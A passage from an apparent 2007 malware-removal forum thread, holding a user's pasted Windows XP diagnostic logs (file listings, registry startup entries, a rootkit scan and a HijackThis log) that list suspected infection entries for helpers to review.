2007-02-06 15:15 <DIR> d-------- C:\DOCUME~1\ALLUSE~1\Application Data\SUPERAntiSpyware.com
2007-02-06 15:14 <DIR> d-------- C:\Program Files\Common Files\Wise Installation Wizard
2007-02-06 13:12 <DIR> d-------- C:\WINDOWS\LastGood
2007-02-06 13:12 <DIR> d-------- C:\WINDOWS\BDOSCAN8
2007-02-05 16:26 <DIR> d-------- C:\VundoFix Backups
2007-02-05 12:16 <DIR> d-------- C:\WINDOWS\Prefetch
2007-02-05 12:15 33,792 --------- C:\WINDOWS\system32\drivers\escanmxx.sys
2007-02-05 12:13 7,583 --a------ C:\WINDOWS\system32\eInstall.dat
2007-02-05 12:13 12,560 --a------ C:\WINDOWS\WSSPORD.DAT
2007-02-05 12:12 <DIR> d-------- C:\PUB
2007-02-05 12:11 508,928 --a------ C:\WINDOWS\system32\eInstall.exe
2007-02-05 12:11 32,768 --a------ C:\WINDOWS\system32\esmxlog.dll
2007-02-05 12:11 138,000 --a------ C:\WINDOWS\system32\drivers\klif108.sys
2007-02-05 12:11 117,008 --a------ C:\WINDOWS\system32\drivers\klif50.sys
2007-02-05 12:11 <DIR> d-------- C:\WINDOWS\system32\ES_SETUP
2007-02-05 12:11 <DIR> d-------- C:\AVPDOS
2007-02-05 12:10 <DIR> d-------- C:\DOCUME~1\ALLUSE~1\Application Data\Avg7
2007-02-05 12:09 950,272 --a------ C:\WINDOWS\system32\contfilt.dll
2007-02-05 12:09 9,488 --a------ C:\WINDOWS\sporder.dll
2007-02-05 12:09 7,680 --a------ C:\WINDOWS\sporder.exe
2007-02-05 12:09 41,984 --a------ C:\WINDOWS\killproc.exe
2007-02-05 12:09 40,448 --a------ C:\WINDOWS\inst_tsp.exe
2007-02-05 12:09 339,968 --a------ C:\WINDOWS\system32\mwtsp.dll
2007-02-05 12:09 14,866 --a------ C:\WINDOWS\winsbak.reg
2007-02-05 12:09 134,144 --a------ C:\WINDOWS\R.COM
2007-02-05 12:09 130,560 --a------ C:\WINDOWS\system32\ZIPDLL.DLL
2007-02-05 12:09 128,512 --a------ C:\WINDOWS\system32\T.COM
2007-02-05 12:09 125,440 --a------ C:\WINDOWS\system32\UNZDLL.DLL
2007-02-05 12:09 118,784 --a------ C:\WINDOWS\system32\mwnsp.dll
2007-02-05 12:09 105,944 --a------ C:\WINDOWS\winsbak2.reg
2007-02-05 12:09 <DIR> d-------- C:\WINDOWS\system32\FLCSS.EXE
2007-02-05 12:09 <DIR> d-------- C:\Program Files\eScan
2007-02-05 12:09 <DIR> d-------- C:\Program Files\Common Files\MicroWorld
2007-02-05 12:09 <DIR> d-------- C:\DOCUME~1\REMOTE~1\Documents
2007-02-05 12:09 <DIR> d-------- C:\DOCUME~1\LOCALS~1\Documents
2007-02-04 15:08 76,589 --a------ C:\DOCUME~1\Sys\3.exe
2007-02-04 11:06 <DIR> d-------- C:\HIJACKTHIS
2007-01-28 14:16 <DIR> d-------- C:\Program Files\Payroll 2007
2007-01-28 14:15 <DIR> d-------- C:\DOCUME~1\Sys\Application Data\{54B1765B-9375-4819-95E7-963DB04D3A42}
2007-01-28 13:09 5,680 --a------ C:\WINDOWS\system32\drivers\psntkd20.sys
2007-01-27 20:58 <DIR> d-------- C:\DOCUME~1\Sys\Application Data\DivX
2007-01-27 20:57 36,624 --------- C:\WINDOWS\system32\drivers\PxHelp20.sys
2007-01-27 20:57 2,560 --------- C:\WINDOWS\system32\drivers\cdralw2k.sys
2007-01-27 20:57 2,432 --------- C:\WINDOWS\system32\drivers\cdr4_xp.sys
2007-01-27 20:57 129,784 --a------ C:\WINDOWS\system32\pxafs.dll
2007-01-27 20:57 118,520 --a------ C:\WINDOWS\system32\pxinsi64.exe
2007-01-27 20:57 116,472 --a------ C:\WINDOWS\system32\pxcpyi64.exe
2007-01-27 20:57 <DIR> d-------- C:\Program Files\DivX
2007-01-27 13:11 <DIR> d--h----- C:\WINDOWS\system32\GroupPolicy
2007-01-27 12:32 8,192 --a------ C:\WINDOWS\system32\tsbyuv.dll
2007-01-27 12:32 49,664 --a------ C:\WINDOWS\system32\vfwwdm32.dll
2007-01-27 12:32 45,568 --a------ C:\WINDOWS\system32\iyuv_32.dll
2007-01-27 12:32 10,240 -ra------ C:\WINDOWS\system32\PA207Usd.dll
2007-01-27 12:31 <DIR> d-------- C:\WINDOWS\LastGood.Tmp
2007-01-27 12:31 <DIR> d-------- C:\Program Files\zebronics webcamera model zeb-100k
2007-01-27 12:31 <DIR> d-------- C:\Program Files\Common Files\PCCamera
2007-01-27 07:48 457,097 --ahs---- C:\WINDOWS\system32\ccbeg.bak2
2007-01-26 17:02 <DIR> d-------- C:\DOCUME~1\Sys\Application Data\Leadertech
2007-01-26 06:49 524,288 --a------ C:\WINDOWS\system32\DivXsm.exe
2007-01-26 06:49 3,596,288 --a------ C:\WINDOWS\system32\qt-dx331.dll
2007-01-26 06:48 200,704 --a------ C:\WINDOWS\system32\ssldivx.dll
2007-01-26 06:48 1,044,480 --a------ C:\WINDOWS\system32\libdivx.dll
2007-01-26 06:43 823,296 --a------ C:\WINDOWS\system32\divx_xx0c.dll
2007-01-26 06:43 823,296 --a------ C:\WINDOWS\system32\divx_xx07.dll
2007-01-26 06:43 802,816 --a------ C:\WINDOWS\system32\divx_xx11.dll
2007-01-26 06:43 738,906 --a------ C:\WINDOWS\system32\DivX.dll
2007-01-26 06:43 73,728 --a------ C:\WINDOWS\system32\dpl100.dll
2007-01-26 06:43 593,920 --a------ C:\WINDOWS\system32\dpuGUI11.dll
2007-01-26 06:43 57,344 --a------ C:\WINDOWS\system32\dpv11.dll
2007-01-26 06:43 53,248 --a------ C:\WINDOWS\system32\dpuGUI10.dll
2007-01-26 06:43 344,064 --a------ C:\WINDOWS\system32\dpus11.dll
2007-01-26 06:43 294,912 --a------ C:\WINDOWS\system32\dpu11.dll
2007-01-26 06:43 294,912 --a------ C:\WINDOWS\system32\dpu10.dll
2007-01-26 06:43 196,608 --a------ C:\WINDOWS\system32\dtu100.dll
2007-01-25 21:43 435,704 --ahs---- C:\WINDOWS\system32\ccbeg.bak1
2007-01-23 20:20 0 --a------ C:\WINDOWS\system32\setup_23367.exe
2007-01-23 20:19 0 --a------ C:\WINDOWS\system32\eraseme_38347.exe
2007-01-21 19:05 <DIR> d-------- C:\Program Files\Common Files\xing shared
2007-01-21 18:53 <DIR> d-------- C:\DOCUME~1\Sys\Application Data\Real
2007-01-16 16:22 <DIR> d-------- C:\DOCUME~1\Sys\Application Data\AdobeAUM
2007-01-16 15:51 <DIR> d-------- C:\DOCUME~1\ALLUSE~1\Application Data\Adobe
2007-01-13 11:32 <DIR> d-------- C:\Program Files\Grisoft


(((((((((((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))))


2007-02-04 12:51 -------- d-------- C:\Program Files\xoftspy
2007-01-30 07:48 -------- d-------- C:\DOCUME~1\Sys\Application Data\skype
2007-01-28 14:15 -------- d-------- C:\DOCUME~1\Sys\Application Data\{54b1765b-9375-4819-95e7-963db04d3a42}
2007-01-28 12:14 -------- d-------- C:\Program Files\spyware nuker
2007-01-28 11:52 -------- d-------- C:\Program Files\yahoo!
2007-01-27 12:31 -------- d--h----- C:\Program Files\installshield installation information
2007-01-22 12:06 -------- d-------- C:\DOCUME~1\Sys\Application Data\adobeum
2007-01-21 19:05 -------- d-------- C:\Program Files\Common Files\real
2007-01-16 16:22 -------- d-------- C:\DOCUME~1\Sys\Application Data\adobe
2007-01-13 12:16 -------- d-------- C:\Program Files\Common Files\symantec shared
2006-12-25 10:36 1682 --ahs---- C:\WINDOWS\system32\kgygaavl.sys
2006-12-21 07:47 304160 --a------ C:\StiImg.dat
2006-12-20 10:33 -------- d-------- C:\DOCUME~1\Sys\Application Data\google
2006-12-20 10:25 -------- d-------- C:\Program Files\google
2006-12-20 10:23 -------- d-------- C:\DOCUME~1\Sys\Application Data\macromedia
2006-12-12 21:54 12288 --a------ C:\WINDOWS\system32\divxwmpexttype.dll
2006-12-12 21:54 118784 --a------ C:\WINDOWS\system32\divxcodecupdatechecker.exe
2006-12-06 11:25 56 -r-hs---- C:\WINDOWS\system32\fc5303fb6f.sys


(((((((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))

*Note* empty entries & legit default entries are not shown

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run]
"ctfmon.exe"="C:\\WINDOWS\\System32\\ctfmon.exe"
"MSMSGS"="\"C:\\Program Files\\Messenger\\msmsgs.exe\" /background"
"Yahoo! Pager"="\"C:\\PROGRA~1\\Yahoo!\\MESSEN~1\\YAHOOM~1.EXE\" -quiet"
"swg"="C:\\Program Files\\Google\\GoogleToolbarNotifier\\1.2.908.8472\\GoogleToolbarNotifier.exe"
"Skype"="\"D:\\Program Files\\Skype\\Phone\\Skype.exe\" /nosplash /minimized"
"john315"="C:\\WINDOWS\\system32\\srrvc.exe"
"staeck12"="C:\\WINDOWS\\system32\\mfcee.exe"
"melg34"="C:\\WINDOWS\\system32\\mdmd.exe"
"SUPERAntiSpyware"="D:\\Program Files\\SUPERAntiSpyware\\SUPERAntiSpyware.exe"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run]
"SMSERIAL"="sm56hlpr.exe"
"RTHDCPL"="RTHDCPL.EXE"
"Alcmtr"="ALCMTR.EXE"
"QuickTime Task"="\"C:\\Program Files\\QuickTime\\qttask.exe\" -atboottime"
"SWN2"="C:\\Program Files\\Spyware Nuker\\swnxt.exe /h"
"DSLSTATEXE"="C:\\Program Files\\GlobespanVirata\\Adsl\\dslstat.exe icon"
"DSLAGENTEXE"="C:\\Program Files\\GlobespanVirata\\Adsl\\dslagent.exe"
"Adobe Photo Downloader"="\"C:\\Program Files\\Adobe\\Photoshop Album Starter Edition\\3.0\\Apps\\apdproxy.exe\""
"TkBellExe"="\"C:\\Program Files\\Common Files\\Real\\Update_OB\\realsched.exe\" -osboot"
"john315"="C:\\WINDOWS\\system32\\srrvc.exe"
"MailScan Dispatcher"="\"C:\\Program Files\\eScan\\LAUNCH.EXE\""
"eScan Updater"="C:\\PROGRA~1\\eScan\\TRAYICOS.EXE /App"
"eScan Monitor"="C:\\PROGRA~1\\eScan\\AVPMWrap.EXE"
"staeck12"="C:\\WINDOWS\\system32\\mfcee.exe"
"melg34"="C:\\WINDOWS\\system32\\mdmd.exe"
"!AVG Anti-Spyware"="\"D:\\Program Files\\AVG Anti-Spyware 7.5\\avgas.exe\" /minimized"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents]

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\IMAIL]
"Installed"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MAPI]
"Installed"="1"
"NoChange"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MSFS]
"Installed"="1"

[HKEY_USERS\.default\software\microsoft\windows\currentversion\runonce]
"RunNarrator"="Narrator.exe"

[HKEY_USERS\s-1-5-18\software\microsoft\windows\currentversion\runonce]
"RunNarrator"="Narrator.exe"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Documents and Settings^Sys^Start Menu^Programs^Startup^PANTONE® for fashion and home 3.0.lnk]
"path"="C:\\Documents and Settings\\Sys\\Start Menu\\Programs\\Startup\\PANTONE® for fashion and home 3.0.lnk"
"backup"="C:\\WINDOWS\\pss\\PANTONE® for fashion and home 3.0.lnkStartup"
"location"="Startup"
"command"="C:\\PROGRA~1\\PANTON~1\\PANTON~1.0\\PANTON~1.EXE "
"item"="PANTONE® for fashion and home 3.0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DownloadAccelerator]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="DAP"
"hkey"="HKLM"
"command"="D:\\PROGRA~1\\DAP\\DAP.EXE /STARTUP"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="iTunesHelper"
"hkey"="HKLM"
"command"="\"D:\\Program Files\\iTunes\\iTunesHelper.exe\""
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MSMSGS]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="msmsgs"
"hkey"="HKCU"
"command"="\"C:\\Program Files\\Messenger\\msmsgs.exe\" /background"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NeroFilterCheck]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="NeroCheck"
"hkey"="HKLM"
"command"="C:\\WINDOWS\\system32\\NeroCheck.exe"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="qttask"
"hkey"="HKLM"
"command"="\"C:\\Program Files\\QuickTime\\qttask.exe\" -atboottime"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RealTray]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="RealPlay"
"hkey"="HKLM"
"command"="C:\\Program Files\\Real\\RealPlayer\\RealPlay.exe SYSTEMBOOTHIDEPLAYER"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Share-to-Web Namespace Daemon]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="hpgs2wnd"
"hkey"="HKLM"
"command"="D:\\Program Files\\HP Share-to-Web\\hpgs2wnd.exe"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skype]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="Skype"
"hkey"="HKCU"
"command"="\"D:\\Program Files\\Skype\\Phone\\Skype.exe\" /nosplash /minimized"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SunJavaUpdateSched]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="jusched"
"hkey"="HKLM"
"command"="\"C:\\Program Files\\Java\\jre1.5.0_08\\bin\\jusched.exe\""
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SWN2]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="swnxt"
"hkey"="HKLM"
"command"="C:\\Program Files\\Spyware Nuker\\swnxt.exe /h"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\WinampAgent]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="Winampa"
"hkey"="HKLM"
"command"="\"D:\\Program Files\\Winamp\\Winampa.exe\""
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="YAHOOM~1"
"hkey"="HKCU"
"command"="\"C:\\PROGRA~1\\Yahoo!\\MESSEN~1\\YAHOOM~1.EXE\" -quiet"
"inimapping"="0"


[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shellexecutehooks]
"{481E7983-1F2B-4250-951A-44E0902DF978}"=""
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"=""
"{57B86673-276A-48B2-BAE7-C6DBB3020EB8}"="AVG Anti-Spyware 7.5"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"SynchronousMachineGroupPolicy"=dword:00000000
"SynchronousUserGroupPolicy"=dword:00000000

HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll"

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Svchost]
LocalService REG_MULTI_SZ AlerterWebClientLmHostsRemoteRegistryupnphostSSDPSRV\
NetworkService REG_MULTI_SZ DnsCache\
rpcss REG_MULTI_SZ RpcSs\
imgsvc REG_MULTI_SZ StiSvc\
termsvcs REG_MULTI_SZ TermService\



********************************************************************

catchme 0.1 W2K/XP - userland rootkit detector by Gmer, 17 October 2006
http://www.gmer.net

scanning hidden processes ...

scanning hidden services ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden processes: 0
hidden services: 0
hidden files: 0

********************************************************************

Completion time: 07-02-08 16:23:19


3) NEW HIJACK THIS LOG:
Logfile of HijackThis v1.99.1
Scan saved at 4:24:54 PM, on 2/8/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\eScan\TRAYSSER.EXE
C:\PROGRA~1\eScan\avpm.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWAgent.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\sm56hlpr.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Spyware Nuker\swnxt.exe
C:\Program Files\GlobespanVirata\Adsl\dslstat.exe
C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\PROGRA~1\eScan\TRAYICOS.EXE
C:\PROGRA~1\eScan\AVPMWrap.EXE
D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\PROGRA~1\eScan\AvpM.exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
D:\Program Files\Skype\Phone\Skype.exe
D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\Program Files\SAMSUNG\Samsung Multimedia Keyboard\gpkbd.exe
D:\PROGRA~1\DAP\DAP.EXE
C:\PROGRA~1\eScan\MAILDISP.EXE
C:\PROGRA~1\ESCAN\SPOOLER.EXE
C:\PROGRA~1\eScan\MAILSCAN.EXE
C:\PROGRA~1\eScan\kavss.exe
C:\HIJACKTHIS\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.co.in/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.com/search?q=%s
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = iexplore
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: DAPHelper Class - {0000CC75-ACF3-4cac-A0A9-DD3868E06852} - D:\Program Files\DAP\DAPBHO.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {481E7983-1F2B-4250-951A-44E0902DF978} - (no file)
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: (no name) - {68D5CF1D-EC5C-4bdd-A9EF-F0E517565D50} - (no file)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: (no name) - {F2496031-4FE4-497E-8F75-04E0A180366E} - C:\WINDOWS\System32\vtsqn.dll (file missing)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: DAP Bar - {62999427-33FC-4baf-9C9C-BCE6BD127F08} - D:\Program Files\DAP\DAPIEBar.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [SMSERIAL] sm56hlpr.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SWN2] C:\Program Files\Spyware Nuker\swnxt.exe /h
O4 - HKLM\..\Run: [DSLSTATEXE] C:\Program Files\GlobespanVirata\Adsl\dslstat.exe icon
O4 - HKLM\..\Run: [DSLAGENTEXE] C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKLM\..\Run: [MailScan Dispatcher] "C:\Program Files\eScan\LAUNCH.EXE"
O4 - HKLM\..\Run: [eScan Updater] C:\PROGRA~1\eScan\TRAYICOS.EXE /App
O4 - HKLM\..\Run: [eScan Monitor] C:\PROGRA~1\eScan\AVPMWrap.EXE
O4 - HKLM\..\Run: [staeck12] C:\WINDOWS\system32\mfcee.exe
O4 - HKLM\..\Run: [melg34] C:\WINDOWS\system32\mdmd.exe
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [Skype] "D:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKCU\..\Run: [staeck12] C:\WINDOWS\system32\mfcee.exe
O4 - HKCU\..\Run: [melg34] C:\WINDOWS\system32\mdmd.exe
O4 - HKCU\..\Run: [SUPERAntiSpyware] D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Samsung Multimedia Keyboard.lnk = ?
O8 - Extra context menu item: &Download with &DAP - D:\PROGRA~1\DAP\dapextie.htm
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Advanced Email Extractor - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html
O8 - Extra context menu item: Download &all with DAP - D:\PROGRA~1\DAP\dapextie2.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://D:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Scan link with AEE - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/link.html
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Run DAP - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - D:\PROGRA~1\DAP\DAP.EXE
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O9 - Extra 'Tools' menuitem: Advanced Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://download.bitdefender.com/resources/scan8/oscan8.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{17BBF687-1141-4522-B007-EF63C7F4B7EE}: NameServer = 202.54.6.60,202.54.29.5
O20 - Winlogon Notify: !SASWinLogon - D:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: eScan Server-Updater (eScan-trayicos) - MicroWorld Technologies Inc. - C:\PROGRA~1\eScan\TRAYSSER.EXE
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: eScan Monitor Service (KAVMonitorService) - Kaspersky Labs. - C:\PROGRA~1\eScan\avpm.exe
O23 - Service: MWAgent - MicroWorld Technologies Inc. - C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
Go to the top of the page
 
+Quote Post
rridgely
post Feb 9 2007, 06:17 PM
Post #9


I hate computers
Group Icon

